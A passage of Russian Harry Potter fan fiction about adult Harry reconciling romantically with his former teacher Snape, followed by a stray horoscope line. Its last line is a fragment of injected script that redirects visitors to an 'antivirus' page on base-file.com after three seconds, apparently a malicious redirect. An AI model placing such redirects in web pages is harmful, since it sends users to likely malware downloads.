И это оказалось тактической ошибкой.

Потому что Гарри тут же оказался рядом, и поцеловал Северуса с таким энтузиазмом, что повалил их обоих. – Я скучал по тебе, - прошептал его юный любовник, теребя губами мочку уха Снейпа. Северус судорожно вдохнул и обнял Гарри раньше, чем успел сообразить, что делает. А потом убрать руки было бы уж совсем бестактно.

К тому же по нему еще никто не скучал.

- Когда только успел, - пробормотал Снейп, не сумев придумать ничего лучшего.

Гарри отстранился и неожиданно серьезно посмотрел на своего бывшего профессора. – За годы, - ответил он. – С тех пор, как закончил школу. Знаешь, я не думал, что что-нибудь получиться. Но потом мне предложили вернуться в школу и я согласился, потому что хотел быть здесь. Не просто в Хогварце, а здесь.

Снейп обдумал услышанное. – Все это не имеет смысла. – Наконец решил он.

- Моя жизнь никогда не имела смысла, - ответил Гарри. – Я к этому привык.

Довольно долго они просто смотрели друг на друга. – Пожалуйста, - тихо попросил Снейп, смущенный уже тем, что сказал «пожалуйста», - скажи, что я там наговорил той ночью.1

Гарри наклонился и прошептал несколько слов Северусу на ухо.

Снейп моргнул.

- Я это сказал? Честно?

Гарри кивнул. – Именно это.

- А может тебепросто показалось

Гарри ответил обиженным взглядом.

- Ладно. – Снейп снова задумался. – Переживем.

Гарри прикусил губу. – Так… мне можно остаться?

- Было бы крайне… нелогично с моей стороны ответить «нет», - осторожно сказал Снейп.

Гарри слегка улыбнулся – это была не та сияющая улыбка, от которой у Снейпа перехватывало дыхание. – Что бы не случилось, ты всегда логичен.

- Есть такое дело, - согласился Снейп. 

Гарри снова поцеловал его и начал расстегивать пуговицы на рубашке. Прежде чем отбросить все мысли, Снейп успел подумать, что учитывая все произошедшее за последние месяцы, у них может что-нибудь получиться. Еще один неторопливый, горячий поцелуй.

Ох.

Они провели вместе пять месяцев. Может быть их хватит еще на пять. Все зависит от того, как смотреть на вещи. Если чего-то сильно хочешь, можно приложить к этому некоторое усилие, так ведь?

Пожалуй, он попробует. Но только один раз.

Рыбы: (19 Февраля—20 Марта)
В следующую пятницу вы будете весь день смотреть прогнозы погоды, надеясь понять, чем это все закончиться.

 

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>